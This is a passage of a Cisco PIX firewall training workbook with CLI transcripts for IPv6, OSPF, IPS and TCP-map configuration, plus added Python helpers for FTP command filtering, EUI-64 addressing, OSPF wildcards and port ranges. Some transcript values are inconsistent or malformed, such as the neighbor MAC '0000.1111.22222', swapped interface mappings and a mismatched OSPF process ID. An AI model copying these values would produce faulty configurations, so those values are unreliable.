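CLIENT_ALIASES = {"get": "RETR", "put": "STOR"}


@dataclass
class FtpMap:
    denied: set = field(default_factory=set)  # protocol verbs to block, upper-case
    mask_syst_reply: bool = False


def parse_ftp_map(config: str) -> FtpMap:
    """Parse the body of an ftp-map: 'request-command deny <cmd>...' and 'mask-syst-reply'."""
    fmap = FtpMap()
    for line in config.splitlines():
        parts = line.split()
        if parts[:2] == ["request-command", "deny"]:
            for name in parts[2:]:
                fmap.denied.add(CLIENT_ALIASES.get(name.lower(), name.upper()))
        elif parts == ["mask-syst-reply"]:
            fmap.mask_syst_reply = True
    return fmap


def inspect_client_commands(fmap: FtpMap, lines):
    """Return (verb, verdict) for each control-channel line sent by the client.
    'deny' marks a command the ftp-map blocks; everything else is 'allow'."""
    verdicts = []
    for line in lines:
        verb = line.strip().split(" ", 1)[0].upper()   # FTP verbs are case-insensitive
        verdicts.append((verb, "deny" if verb in fmap.denied else "allow"))
    return verdicts


def filter_server_reply(fmap: FtpMap, reply: str) -> str:
    """Mask the 215 reply to SYST so the server's OS is not disclosed to the client.
    Replacing the text with X characters is an assumption; the page only says 'mask'."""
    if fmap.mask_syst_reply and reply.startswith("215 "):
        return "215 " + "X" * len(reply[4:])
    return reply


# Constructed ftp-map body, using the commands listed in the transcript above.
CONSTRUCTED_FTP_MAP = """\
 request-command deny dele rmd put
 mask-syst-reply
"""

# Constructed client control-channel lines (not captured traffic).
CONSTRUCTED_SESSION = [
    "USER anonymous",
    "SYST",
    "RETR README",
    "STOR upload.bin",
    "dele README",
    "QUIT",
]

if __name__ == "__main__":
    fmap = parse_ftp_map(CONSTRUCTED_FTP_MAP)
    for verb, verdict in inspect_client_commands(fmap, CONSTRUCTED_SESSION):
        print(f"{verb:6} {verdict}")
    print(filter_server_reply(fmap, "215 UNIX Type: L8"))
```

The deny set is built from protocol verbs, so a client that types "put" and one that sends STOR directly are treated identically; filtering on the client-side spelling alone would miss the second.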

Cisco PIX Challenge 55


Outline
This challenge involves configuring IPv6.
Objectives
The objectives of this challenge are to:

Define IPv6 on E0.
Define IPv6 neighbor discovery to learn about neighboring devices.
Define a static IPv6 mapping (if the automated discovery does not work).
Define the default route.

Commands
pixfirewall(config)# int e0
pixfirewall(config-if)# ipv6 address autoconfig
pixfirewall(config-if)# ipv6 enable
pixfirewall(config-if)# exit
pixfirewall(config)# int e1
pixfirewall(config-if)# ipv6 address 2001:400:3:1::1/64
pixfirewall(config-if)# ipv6 enable
pixfirewall(config-if)# ipv6 nd ns-interval 100
pixfirewall(config-if)# ipv6 nd ra-interval 100
pixfirewall(config-if)# ipv6 nd reachable-time 100
pixfirewall(config-if)# ipv6 nd prefix 0800::/64
pixfirewall(config-if)# exit
pixfirewall(config)# ipv6 route outside ::/0 2001:400:3:1::1
pixfirewall(config)# ipv6 neighbor fe80:0000 inside 0000.1111.22222
pixfirewall# sh ipv interface
pixfirewall# sh ipv6 route

Example
pixfirewall(config)# int e0
pixfirewall(config-if)# ipv6 ?
interface mode commands/options:
IPv6 interface subcommands:
  address  Configure IPv6 address on interface
  enable   Enable IPv6 on interface
  nd       IPv6 interface Neighbor Discovery subcommands
configure mode commands/options:
  access-list  Configure access policy for IPv6 traffic through the system
  icmp         Configure access rules for ICMPv6 traffic terminating at an
               interface
  neighbor     Neighbor
  route        Configure IPv6 routes
pixfirewall(config-if)# ipv6 address ?
interface mode commands/options:
  Hostname or X:X:X:X::X  IPv6 link-local address
  X:X:X:X::X/<0-128>      IPv6 prefix
  autoconfig              Obtain address using autoconfiguration
configure mode commands/options:
  WORD  Access list identifier
pixfirewall(config-if)# ipv6 address autoconfig
pixfirewall(config-if)# ipv6 enable
pixfirewall(config-if)# exit
pixfirewall(config)# int e1
pixfirewall(config-if)# ipv6 address 2001:400:3:1::1/64
pixfirewall(config-if)# ipv6 enable
pixfirewall(config-if)# ipv6 nd ?
interface mode commands/options:
  dad             Duplicate Address Detection
  ns-interval     Set advertised NS retransmission interval
  prefix          Configure IPv6 Routing Prefix Advertisement
  ra-interval     Set IPv6 Router Advertisement Interval
  ra-lifetime     Set IPv6 Router Advertisement Lifetime
  reachable-time  Set advertised reachability time
  suppress-ra     Suppress IPv6 Router Advertisements
pixfirewall(config-if)# ipv6 nd ns-interval ?
interface mode commands/options:
  <1000-3600000>  Retransmission interval in milliseconds
pixfirewall(config-if)# ipv6 nd ns-interval 100
pixfirewall(config-if)# ipv6 nd p ?
interface mode commands/options:
  X:X:X:X::X/<0-128>  IPv6 prefix x:x::y/<z>
  default             Specify prefix default parameters
pixfirewall(config-if)# ipv6 nd prefix 0800::/64
pixfirewall(config-if)# ipv6 nd ra-interval ?
interface mode commands/options:
  <3-1800>  RA Interval (sec)
  msec      Interval in milliseconds
pixfirewall(config-if)# ipv6 nd ra-interval 100
pixfirewall(config-if)# ipv6 nd reachable-time ?
interface mode commands/options:
  <0-3600000>  Reachability time in milliseconds
pixfirewall(config-if)# ipv6 nd reachable-time 100
pixfirewall(config-if)# exit
pixfirewall(config)# ipv ?
configure mode commands/options:
  access-list  Configure access policy for IPv6 traffic through the system
  icmp         Configure access rules for ICMPv6 traffic terminating at an
               interface
  neighbor     Neighbor
  route        Configure IPv6 routes
pixfirewall(config)# ipv route ?
configure mode commands/options:
Current available interface(s):
  Inf2     Name of interface Ethernet2
  Inside   Name of interface Ethernet1
  Outside  Name of interface Ethernet0
pixfirewall(config)# ipv r outside ?
configure mode commands/options:
  X:X:X:X::X/<0-128>  IPv6 prefix
pixfirewall(config)# ipv r outside ::/0 ?
configure mode commands/options:
  Hostname or X:X:X:X::X  IPv6 name or address
pixfirewall(config)# ipv6 route outside ::/0 2001:400:3:1::1

To define a static entry, if discovery does not work:

pixfirewall(config)# ipv6 ?
configure mode commands/options:
  access-list  Configure access policy for IPv6 traffic through the system
  icmp         Configure access rules for ICMPv6 traffic terminating at an
               interface
  neighbor     Neighbor
  route        Configure IPv6 routes
pixfirewall(config)# ipv6 neighbor ?
configure mode commands/options:
  X:X:X:X::X  IPv6 address
pixfirewall(config)# ipv6 neighbor fe80:0000 ?
configure mode commands/options:
Current available interface(s):
  Inf2     Name of interface Ethernet2
  Outside  Name of interface Ethernet1
  Inside   Name of interface Ethernet0
pixfirewall(config)# ipv6 neighbor fe80:0000 inside 0000.1111.22222
pixfirewall(config)# exit
pixfirewall# sh ipv6 ?
  access-list  Show hit counters for access policies
  icmp         Show ICMPv6 access rules configured on all interfaces
  interface    IPv6 interface status and configuration
  neighbor     Show IPv6 neighbor cache entries
  route        Show IPv6 routes
  routers      Show local IPv6 routers
  traffic      IPv6 traffic statistics

pixfirewall# sh ipv interface
outside is administratively down, line protocol is down
IPv6 is enabled, link-local address is fe80::20d:65ff:fe85:77d9 [TENTATIVE]
No global unicast address is configured
Joined group address(es):
ff02::1
ff02::2
ff02::1:ff85:77d9
ICMP error messages limited to one every 100 milliseconds
ICMP redirects are enabled
ND DAD is enabled, number of DAD attempts: 1
ND reachable time is 30000 milliseconds
ND advertised reachable time is 0 milliseconds
ND advertised retransmit interval is 1000 milliseconds
ND router advertisements are sent every 200 seconds
ND router advertisements live for 1800 seconds
Hosts use stateless autoconfig for addresses.
inside is administratively down, line protocol is down
IPv6 is enabled, link-local address is fe80::20d:65ff:fe85:77da [TENTATIVE]
Global unicast address(es):
2001:400:3:1::1, subnet is 2001:400:3:1::/64 [TENTATIVE]
Joined group address(es):
ff02::1
ff02::2
ff02::1:ff85:77da
ICMP error messages limited to one every 100 milliseconds
ICMP redirects are enabled
ND DAD is enabled, number of DAD attempts: 1
ND reachable time is 30000 milliseconds
ND advertised reachable time is 0 milliseconds
ND advertised retransmit interval is 1000 milliseconds
ND router advertisements are sent every 200 seconds
ND router advertisements live for 1800 seconds
Hosts use stateless autoconfig for addresses.
pixfirewall# sh ipv6 route
IPv6 Routing Table - 2 entries
Codes: C - Connected, L - Local, S - Static, R - RIP, B - BGP
       U - Per-user Static route
       I1 - ISIS L1, I2 - ISIS L2, IA - ISIS interarea
       O - OSPF intra, OI - OSPF inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2
L   fe80::/10 [0/0]
     via ::, outside
     via ::, inside
     via ::, inf2
L   ff00::/8 [0/0]
     via ::, outside
     via ::, inside
     via ::, inf2
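As an added example (not from the NetworkSims material), the Python below reproduces the addresses that appear in the show ipv6 interface output above: the link-local address fe80::20d:65ff:fe85:77d9 is the modified EUI-64 form of the MAC 00:0d:65:85:77:d9, and the joined group ff02::1:ff85:77d9 is that address's solicited-node multicast group. The last function compares the groups an interface lists against the groups it should have joined; per RFC 4291 a node joins one solicited-node group per unicast address, so for inside the global address 2001:400:3:1::1 implies ff02::1:ff00:1 as well, which the transcript above does not list. The MAC and the group lists are taken from the transcript; is_router defaulting to true (the firewall forwards IPv6 and joins ff02::2) is an assumption.

```python
import ipaddress


def eui64_link_local(mac: str) -> ipaddress.IPv6Address:
    """Link-local address from a 48-bit MAC (modified EUI-64, RFC 4291 appendix A):
    flip the universal/local bit of the first octet and insert ff:fe in the middle."""
    octets = bytes(int(x, 16) for x in mac.replace("-", ":").split(":"))
    if len(octets) != 6:
        raise ValueError(f"not a 48-bit MAC: {mac!r}")
    iid = bytes([octets[0] ^ 0x02]) + octets[1:3] + b"\xff\xfe" + octets[3:]
    return ipaddress.IPv6Address(b"\xfe\x80" + b"\x00" * 6 + iid)


def solicited_node(addr) -> ipaddress.IPv6Address:
    """ff02::1:ffXX:XXXX, where XX:XXXX are the low 24 bits of the unicast address."""
    packed = ipaddress.IPv6Address(addr).packed
    return ipaddress.IPv6Address(b"\xff\x02" + b"\x00" * 9 + b"\x01\xff" + packed[13:])


def expected_groups(unicast_addrs, is_router=True):
    """Groups an interface should have joined: all-nodes ff02::1, all-routers ff02::2
    when the box forwards IPv6, and one solicited-node group per unicast address."""
    groups = {ipaddress.IPv6Address("ff02::1")}
    if is_router:
        groups.add(ipaddress.IPv6Address("ff02::2"))
    for addr in unicast_addrs:
        groups.add(solicited_node(addr))
    return groups


def missing_groups(shown, unicast_addrs, is_router=True):
    """Groups that should be joined but are absent from a 'show ipv6 interface' listing.
    Without its solicited-node group an interface cannot answer neighbor solicitations
    for that address, so the address is unreachable on the link."""
    shown_set = {ipaddress.IPv6Address(g) for g in shown}
    return sorted(expected_groups(unicast_addrs, is_router) - shown_set)


# Values taken from the transcript above.
OUTSIDE_MAC = "00:0d:65:85:77:d9"
INSIDE_GLOBAL = "2001:400:3:1::1"
INSIDE_GROUPS_SHOWN = ["ff02::1", "ff02::2", "ff02::1:ff85:77da"]

if __name__ == "__main__":
    ll = eui64_link_local(OUTSIDE_MAC)
    print("outside link-local:", ll, "solicited-node:", solicited_node(ll))
    inside_ll = eui64_link_local("00:0d:65:85:77:da")
    print("inside missing:", missing_groups(INSIDE_GROUPS_SHOWN, [inside_ll, INSIDE_GLOBAL]))
```

Both interface addresses in the transcript are still marked TENTATIVE, which means duplicate address detection has not completed; the solicited-node group is exactly the group DAD probes are sent to, so checking that it is joined is the first thing to do when an address never leaves the tentative state.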

Cisco PIX Challenge 56


Outline
This challenge involves configuring OSPF routing.
Objectives
The objectives of this challenge are to:

Define OSPF.

Example
pixfirewall(config)# router ?
configure mode commands/options:
ospf Open Shortest Path First (OSPF)
pixfirewall(config)# router ospf ?
pixfirewall(config)# router os ?
configure mode commands/options:
<1-65535> Process ID
pixfirewall(config)# router ospf 111
pixfirewall(config-router)# ?
Router configuration commands:
  area                 OSPF area parameters
  compatible           OSPF compatibility list
  default-information  Control distribution of default information
  distance             Define an administrative distance
  exit                 Exit from router configuration mode
  help                 Interactive help for router subcommands
  ignore               Do not complain about specific event
  log-adj-changes      Log changes in adjacency state
  neighbor             Specify a neighbor router
  network              Add/remove interfaces to/from OSPF routing process
  no                   Negate a command
  redistribute         Redistribute information from another routing process
  router-id            router-id for this OSPF process
  summary-address      Configure IP address summaries
  timers               Adjust routing timers
pixfirewall(config-router)# net ?
router mode commands/options:
  A.B.C.D  Network address
pixfirewall(config-router)# net 10.0.0.0 ?
router mode commands/options:
  A.B.C.D  Mask for network address
pixfirewall(config-router)# net 10.0.0.0 0.0.0.255 ?
router mode commands/options:
  area  Set the OSPF area ID
pixfirewall(config-router)# net 10.0.0.0 0.0.0.255 area ?
router mode commands/options:
  <0-4294967295>  OSPF area ID as a decimal value
  A.B.C.D         OSPF area ID in IP address format
pixfirewall(config-router)# network 10.0.0.0 0.0.0.255 area 1
pixfirewall(config-router)# area ?
router mode commands/options:
  <0-4294967295>  OSPF area ID as a decimal value
  A.B.C.D         OSPF area ID in IP address format
pixfirewall(config-router)# area 1 ?
router mode commands/options:
  authentication  Enable authentication
  default-cost    Set the summary default-cost of a NSSA/stub area
  filter-list     Filter networks between OSPF areas
  nssa            Specify a NSSA area
  range           Summarize routes matching address/mask (border routers only)
  stub            Specify a stub area
  virtual-link    Define a virtual link and its parameters
  <cr>
pixfirewall(config-router)# area 1 authentication
pixfirewall(config-router)# exit
pixfirewall(config)# int e0
pixfirewall(config-if)# ospf ?
interface mode commands/options:
  authentication       Enable authentication
  authentication-key   Authentication password (key)
  cost                 Interface cost
  database-filter      Filter OSPF LSA during synchronization and flooding
  dead-interval        Interval after which a neighbor is declared dead
  hello-interval       Time between HELLO packets
  message-digest-key   Message digest authentication password (key)
  mtu-ignore           Ignores the MTU in DBD packets
  network              Network type
  priority             Router priority
  retransmit-interval  Time between retransmitting lost link state
                       advertisements
  transmit-delay       Link state transmit delay
pixfirewall(config-if)# ospf authentication ?
interface mode commands/options:
  message-digest  Use message-digest authentication
  null            Use no authentication
  <cr>
pixfirewall(config-if)# ospf authentication message-digest
pixfirewall(config-if)# exit
pixfirewall(config)# exit
pixfirewall# sh ospf
 Routing Process "ospf 1" with ID 10.0.0.0 and Domain ID 0.0.0.255
 Supports only single TOS(TOS0) routes
 Does not support opaque LSA
 SPF schedule delay 5 secs, Hold time between two SPFs 10 secs
 Minimum LSA interval 5 secs. Minimum LSA arrival 1 secs
 Number of external LSA 0. Checksum Sum 0x0
 Number of opaque AS LSA 0. Checksum Sum 0x0
 Number of DCbitless external and opaque AS LSA 0
 Number of DoNotAge external and opaque AS LSA 0
 Number of areas in this router is 1. 1 normal 0 stub 0 nssa
 External flood list length 0
    Area 1
        Number of interfaces in this area is 1
        Area has no authentication
        SPF algorithm executed 1 times
        Area ranges are
        Number of LSA 1. Checksum Sum 0xff12
        Number of opaque link LSA 0. Checksum Sum 0x0
        Number of DCbitless LSA 0
        Number of indication LSA 0
        Number of DoNotAge LSA 0
        Flood list length 0
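As an added example (not from the NetworkSims material), the Python below works through the network statement used above, network 10.0.0.0 0.0.0.255 area 1. The second argument is a wildcard mask, where a set bit means "don't care", so the statement enrols every interface whose address matches 10.0.0.x. The code also rejects the most common mistake with this command, typing a subnet mask (255.255.255.0) where a wildcard is expected, which silently enrols the wrong interfaces or none. The interface addresses are constructed (they follow the ARP entries used earlier in this set); first-match selection is a simplification of the real algorithm.

```python
import ipaddress


def parse_network_statement(line: str):
    """'network 10.0.0.0 0.0.0.255 area 1' -> (network, wildcard, area); masks as ints."""
    parts = line.split()
    if len(parts) != 5 or parts[0] not in ("network", "net") or parts[3] != "area":
        raise ValueError(f"not a network statement: {line!r}")
    network = int(ipaddress.IPv4Address(parts[1]))
    wildcard = int(ipaddress.IPv4Address(parts[2]))
    return network, wildcard, parts[4]


def is_wildcard(mask: int) -> bool:
    """A wildcard keeps its 'don't care' ones in the low bits (0.0.0.255, 0.0.255.255).
    A subnet mask (255.255.255.0) has them in the high bits and is almost always a typo here."""
    return mask & (mask + 1) == 0


def wildcard_match(network: int, wildcard: int, ip: str) -> bool:
    """True when ip agrees with network on every bit the wildcard marks as significant."""
    care = ~wildcard & 0xFFFFFFFF
    return (int(ipaddress.IPv4Address(ip)) ^ network) & care == 0


def ospf_areas(statements, interfaces):
    """Map interface name -> area for the first statement matching its address.
    (First match wins here; a simplification of how the router chooses.)"""
    parsed = []
    for stmt in statements:
        network, wildcard, area = parse_network_statement(stmt)
        if not is_wildcard(wildcard):
            raise ValueError(f"{ipaddress.IPv4Address(wildcard)} is a subnet mask, not a wildcard")
        parsed.append((network, wildcard, area))
    result = {}
    for name, ip in interfaces.items():
        for network, wildcard, area in parsed:
            if wildcard_match(network, wildcard, ip):
                result[name] = area
                break
    return result


# Constructed addressing, consistent with the ARP entries used earlier in this set.
CONSTRUCTED_INTERFACES = {"outside": "10.0.0.1", "inside": "11.0.0.1", "inf2": "13.0.0.1"}

if __name__ == "__main__":
    print(ospf_areas(["network 10.0.0.0 0.0.0.255 area 1"], CONSTRUCTED_INTERFACES))
```

With the single statement from the challenge only outside joins area 1, which agrees with "Number of interfaces in this area is 1" in the show ospf output.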

Cisco PIX Challenge 57


Outline
This challenge involves diverting all the traffic to the AIP SSM in promiscuous mode. If the
AIP SSM card then fails, all the traffic will be blocked (fail-close).
Objectives
The objectives of this challenge are to:

Define the class-map.
Define the policy-map.
Apply the policy-map.

Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# ?
MPF class-map configuration commands:
  description  Specify class-map description
  exit         Exit from MPF class-map configuration mode
  help         Help for MPF class-map configuration commands
  match        Configure classification criteria
  no           Negate or set default values of a command
  rename       Rename this class-map
pixfirewall(config-cmap)# match ?
mpf-class-map mode commands/options:
  access-list                 Match an Access List
  any                         Match any packet
  default-inspection-traffic  Match default inspection traffic:
                              ctiqbe----tcp--2748     dns-------udp--53
                              ftp-------tcp--21       gtp-------udp--2123,3386
                              h323-h225-tcp--1720     h323-ras--udp--1718-1719
                              http------tcp--80       icmp------icmp
                              ils-------tcp--389      mgcp------udp--2427,2727
                              netbios---udp--137-138  rpc-------udp--111
                              rsh-------tcp--514      rtsp------tcp--554
                              sip-------tcp--5060     sip-------udp--5060
                              skinny----tcp--2000     smtp------tcp--25
                              sqlnet----tcp--1521     tftp------udp--69
                              xdmcp-----udp--177
  dscp                        Match IP DSCP (DiffServ CodePoints)
  flow                        Flow based Policy
  port                        Match TCP/UDP port(s)
  precedence                  Match IP precedence
  rtp                         Match RTP port numbers
  tunnel-group                Match a Tunnel Group
pixfirewall(config-cmap)# match access-list ?
mpf-class-map mode commands/options:
WORD Access List name
pixfirewall(config-cmap)# match access-list Columbia
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# ?
MPF policy-map class configuration commands:
  exit      Exit from MPF class action configuration mode
  help      Help for MPF policy-map configuration commands
  inspect   Protocol inspection services
  ips       Intrusion prevention services
  no        Negate or set default values of a command
  police    Rate limit traffic for this class
  priority  Strict scheduling priority for this class
  set       Set QoS values or connection values
  <cr>
pixfirewall(config-pmap-c)# ips ?
mpf-policy-map-class mode commands/options:
  inline       Inline mode IPS
  promiscuous  Promiscuous mode IPS
configure mode commands/options:
  df-bit                Set IPsec DF policy
  fragmentation         Set IPsec fragmentation policy
  security-association  Set security association lifetime
  transform-set         Define transform and settings
pixfirewall(config-pmap-c)# ips promiscuous ?
mpf-policy-map-class mode commands/options:
  fail-close  Block traffic if IPS card fails
  fail-open   Permit traffic if IPS card fails
pixfirewall(config-pmap-c)# ips promiscuous fail-close
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ?
configure mode commands/options:
  WORD  Specify policy-map name
pixfirewall(config)# service-policy ANY ?
configure mode commands/options:
  global     Enter this keyword to specify a global policy
  interface  Enter this keyword to specify an interface policy
pixfirewall(config)# service-policy ptest global

In this case the global keyword applies the policy to all the interfaces of the PIX. The alternative is to apply it to individual interfaces:
pixfirewall(config)# service-policy ptest interface inside
pixfirewall(config)# service-policy ptest interface outside
pixfirewall(config)# service-policy ptest interface inf2

Cisco PIX Challenge 58


Outline
This challenge involves defining a TCP-map.
Objectives
The objectives of this challenge are to:

Define a TCP-map.

Example
pixfirewall(config)# tcp-map test
pixfirewall(config-tcp-map)# ?
TCP-map configuration commands:
  check-retransmission    Check retransmit data, disabled by default
  checksum-verification   Verify TCP checksum, disabled by default
  default                 Set a command to its defaults
  exceed-mss              Packet that exceed the Maximum Segment Size set by
                          peer, default is to drop packet
  no                      Negate a command or set its defaults
  reserved-bits           Reserved bits in TCP header are set, default is to
                          allow packet
  syn-data                TCP SYN packets that contain data, default is to
                          allow packet
  tcp-options             Options in TCP header
  ttl-evasion-protection  Protection against time to live (TTL) attacks,
                          enabled by default
  urgent-flag             Urgent flag and urgent offset set, default is to
                          clear flag and offset
  window-variation        Unexpected window size variation, default is to allow
                          connection
pixfirewall(config-tcp-map)# urgent-flag ?
tcp-map mode commands/options:
  allow  Allow packet with urgent flag and urgent offset
  clear  Clear urgent flag and urgent offset and allow packet
pixfirewall(config-tcp-map)# exit
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# ?
MPF class-map configuration commands:
  description  Specify class-map description
  exit         Exit from MPF class-map configuration mode
  help         Help for MPF class-map configuration commands
  match        Configure classification criteria
  no           Negate or set default values of a command
  rename       Rename this class-map
pixfirewall(config-cmap)# match ?
mpf-class-map mode commands/options:
  access-list                 Match an Access List
  any                         Match any packet
  default-inspection-traffic  Match default inspection traffic:
                              ctiqbe----tcp--2748     dns-------udp--53
                              ftp-------tcp--21       gtp-------udp--2123,3386
                              h323-h225-tcp--1720     h323-ras--udp--1718-1719
                              http------tcp--80       icmp------icmp
                              ils-------tcp--389      mgcp------udp--2427,2727
                              netbios---udp--137-138  rpc-------udp--111
                              rsh-------tcp--514      rtsp------tcp--554
                              sip-------tcp--5060     sip-------udp--5060
                              skinny----tcp--2000     smtp------tcp--25
                              sqlnet----tcp--1521     tftp------udp--69
                              xdmcp-----udp--177
  dscp                        Match IP DSCP (DiffServ CodePoints)
  flow                        Flow based Policy
  port                        Match TCP/UDP port(s)
  precedence                  Match IP precedence
  rtp                         Match RTP port numbers
  tunnel-group                Match a Tunnel Group
pixfirewall(config-cmap)# match port ?
mpf-class-map mode commands/options:
  tcp  This keyword specifies TCP port(s)
  udp  This keyword specifies UDP port(s)
pixfirewall(config-cmap)# match port tcp ?
mpf-class-map mode commands/options:
  eq     Port equal to operator
  range  Port range operator
pixfirewall(config-cmap)# match port tcp range ?
mpf-class-map mode commands/options:
  <0-65535>  Enter port number (0 - 65535)
aol
bgp
chargen
cifs
citrix-ica
cmd
ctiqbe
daytime
discard
domain
echo
exec

NetworkSims.com

545

finger
ftp
ftp-data
gopher
h323
hostname
http
https
ident
imap4
irc
kerberos
klogin
kshell
ldap
ldaps
login
lotusnotes
lpd
netbios-ssn
nntp
pcanywhere-data
pim-auto-rp
pop2
pop3
pptp
rsh
rtsp
sip
smtp
sqlnet
ssh
sunrpc
tacacs
talk
telnet
uucp
whois
www
pixfirewall(config-cmap)# match port tcp range ftp-data ?
mpf-class-map mode commands/options:
  <0-65535>  Enter port number (0 - 65535)
aol
bgp
chargen
cifs
citrix-ica
cmd
ctiqbe
daytime
discard
domain
echo
exec
finger
ftp
ftp-data
gopher
h323
hostname
http

NetworkSims.com

546

https
ident
imap4
irc
kerberos
klogin
kshell
ldap
ldaps
login
lotusnotes
lpd
netbios-ssn
nntp
pcanywhere-data
pim-auto-rp
pop2
pop3
pptp
rsh
rtsp
sip
smtp
sqlnet
ssh
sunrpc
tacacs
talk
telnet
uucp
whois
www
pixfirewall(config-cmap)# match port tcp range ftp-data www
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map testing
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# set ?
mpf-policy-map-class mode commands/options:
  connection  Configure connection parameters
configure mode commands/options:
  password-recovery  Password recovery configuration
  resetinbound       Send reset to a denied inbound TCP packet
  resetoutside       Send reset to a denied TCP packet to outside interface
pixfirewall(config-pmap-c)# set connection ?
mpf-policy-map-class mode commands/options:
  advanced-options        Configure advanced connection parameters
  conn-max                Keyword to set the maximum number of all simultaneous
                          connections that are allowed. Default is 0 which
                          means unlimited connections.
  embryonic-conn-max      Keyword to set the maximum number of TCP embryonic
                          connections that are allowed. Default is 0 which
                          means unlimited connections.
  random-sequence-number  Enable/disable TCP sequence number randomization.
                          Default is to enable TCP sequence number
                          randomization
  timeout                 Configure connection timeout parameters
pixfirewall(config-pmap-c)# set connection advanced-options ?
mpf-policy-map-class mode commands/options:
  WORD  Enter TCP map name
pixfirewall(config-pmap-c)# set connection advanced-options test
pixfirewall(config-pmap-c)# exit
pixfirewall(config-pmap)# exit
pixfirewall(config)# service-policy ?
configure mode commands/options:
  WORD  Specify policy-map name
pixfirewall(config)# service-policy testing ?
configure mode commands/options:
  global     Enter this keyword to specify a global policy
  interface  Enter this keyword to specify an interface policy
pixfirewall(config)# service-policy testing global
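As an added example (not from the NetworkSims material), the Python below resolves the match port line used above, match port tcp range ftp-data www, the way the class-map does: ftp-data is port 20 and www is port 80, so the class covers every TCP destination port from 20 to 80 inclusive. That is wider than the two names suggest; ssh, telnet, smtp and DNS over TCP all fall inside the range, and the tcp-map attached through advanced-options applies to them as well. The port-name table is a subset of the keywords listed by the help output, with their IANA numbers; the classifier and the sample flows are constructed for the example.

```python
# Subset of the keywords the help output lists, with their IANA port numbers.
PORT_NAMES = {
    "ftp-data": 20, "ftp": 21, "ssh": 22, "telnet": 23, "smtp": 25, "domain": 53,
    "finger": 79, "http": 80, "www": 80, "pop3": 110, "sunrpc": 111, "nntp": 119,
    "ldap": 389, "https": 443, "rsh": 514,
}


def resolve_port(token: str) -> int:
    """Accept a number in 0-65535 or one of the keywords above."""
    if token.isdigit():
        port = int(token)
        if not 0 <= port <= 65535:
            raise ValueError(f"port out of range: {token}")
        return port
    try:
        return PORT_NAMES[token]
    except KeyError:
        raise ValueError(f"unknown port keyword: {token!r}") from None


def parse_match_port(line: str):
    """'match port tcp range ftp-data www' -> ('tcp', 20, 80); 'eq' yields lo == hi."""
    parts = line.split()
    if len(parts) < 5 or parts[:2] != ["match", "port"] or parts[2] not in ("tcp", "udp"):
        raise ValueError(f"not a match port line: {line!r}")
    proto, op = parts[2], parts[3]
    if op == "eq" and len(parts) == 5:
        lo = hi = resolve_port(parts[4])
    elif op == "range" and len(parts) == 6:
        lo, hi = resolve_port(parts[4]), resolve_port(parts[5])
    else:
        raise ValueError(f"bad operator or argument count: {line!r}")
    if lo > hi:
        raise ValueError("range low end exceeds high end")
    return proto, lo, hi


def flow_matches(rule, proto: str, dst_port: int) -> bool:
    """Would a flow with this protocol and destination port fall into the class?"""
    rule_proto, lo, hi = rule
    return proto == rule_proto and lo <= dst_port <= hi


def services_in_range(rule):
    """Named services the range quietly covers besides its two end points."""
    _, lo, hi = rule
    return sorted({name for name, port in PORT_NAMES.items() if lo <= port <= hi})


if __name__ == "__main__":
    rule = parse_match_port("match port tcp range ftp-data www")
    print(rule, services_in_range(rule))
    # Constructed sample flows: (protocol, destination port)
    for proto, port in [("tcp", 22), ("tcp", 80), ("tcp", 443), ("udp", 53)]:
        print(proto, port, flow_matches(rule, proto, port))
```

If the intent was only FTP and HTTP, two class-maps with match port tcp eq, or an access-list, would express it without the side effect.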

Cisco PIX Challenge 59


Outline
This challenge involves defining an embryonic TCP connection timeout.
Objectives
The objectives of this challenge are to:

Define an embryonic TCP connection timeout.

Example
pixfirewall(config)# access-list Columbia permit ip any any
pixfirewall(config)# class-map ctest
pixfirewall(config-cmap)# ?
MPF class-map configuration commands:
  description  Specify class-map description
  exit         Exit from MPF class-map configuration mode
  help         Help for MPF class-map configuration commands
  match        Configure classification criteria
  no           Negate or set default values of a command
  rename       Rename this class-map
pixfirewall(config-cmap)# match ?
mpf-class-map mode commands/options:
  access-list                 Match an Access List
  any                         Match any packet
  default-inspection-traffic  Match default inspection traffic:
                              ctiqbe----tcp--2748     dns-------udp--53
                              ftp-------tcp--21       gtp-------udp--2123,3386
                              h323-h225-tcp--1720     h323-ras--udp--1718-1719
                              http------tcp--80       icmp------icmp
                              ils-------tcp--389      mgcp------udp--2427,2727
                              netbios---udp--137-138  rpc-------udp--111
                              rsh-------tcp--514      rtsp------tcp--554
                              sip-------tcp--5060     sip-------udp--5060
                              skinny----tcp--2000     smtp------tcp--25
                              sqlnet----tcp--1521     tftp------udp--69
                              xdmcp-----udp--177
  dscp                        Match IP DSCP (DiffServ CodePoints)
  flow                        Flow based Policy
  port                        Match TCP/UDP port(s)
  precedence                  Match IP precedence
  rtp                         Match RTP port numbers
  tunnel-group                Match a Tunnel Group
pixfirewall(config-cmap)# match access-list ?
mpf-class-map mode commands/options:
WORD Access List name
pixfirewall(config-cmap)# match access-list Columbia
pixfirewall(config-cmap)# exit
pixfirewall(config)# policy-map ptest
pixfirewall(config-pmap)# class ctest
pixfirewall(config-pmap-c)# ?
MPF policy-map class configuration commands:
  exit      Exit from MPF class action configuration mode
  help      Help for MPF policy-map configuration commands
  inspect   Protocol inspection services
  ips       Intrusion prevention services
  no        Negate or set default values of a command
  police    Rate limit traffic for this class
  priority  Strict scheduling priority for this class
  set       Set QoS values or connection values
  <cr>
pixfirewall(config-pmap-c)# set ?
mpf-policy-map-class mode commands/options:
  connection  Configure connection parameters
configure mode commands/options:
  password-recovery  Password recovery configuration
  resetinbound       Send reset to a denied inbound TCP packet
  resetoutside       Send reset to a denied TCP packet to outside interface
pixfirewall(config-pmap-c)# set connection ?
mpf-policy-map-class mode commands/options:
  advanced-options        Configure advanced connection parameters
  conn-max                Keyword to set the maximum number of all simultaneous
                          connections that are allowed. Default is 0 which
                          means unlimited connections.
  embryonic-conn-max      Keyword to set the maximum number of TCP embryonic
                          connections that are allowed. Default is 0 which
                          means unlimited connections.
  random-sequence-number  Enable/disable TCP sequence number randomization.
                          Default is to enable TCP sequence number
                          randomization
  timeout                 Configure connection timeout parameters
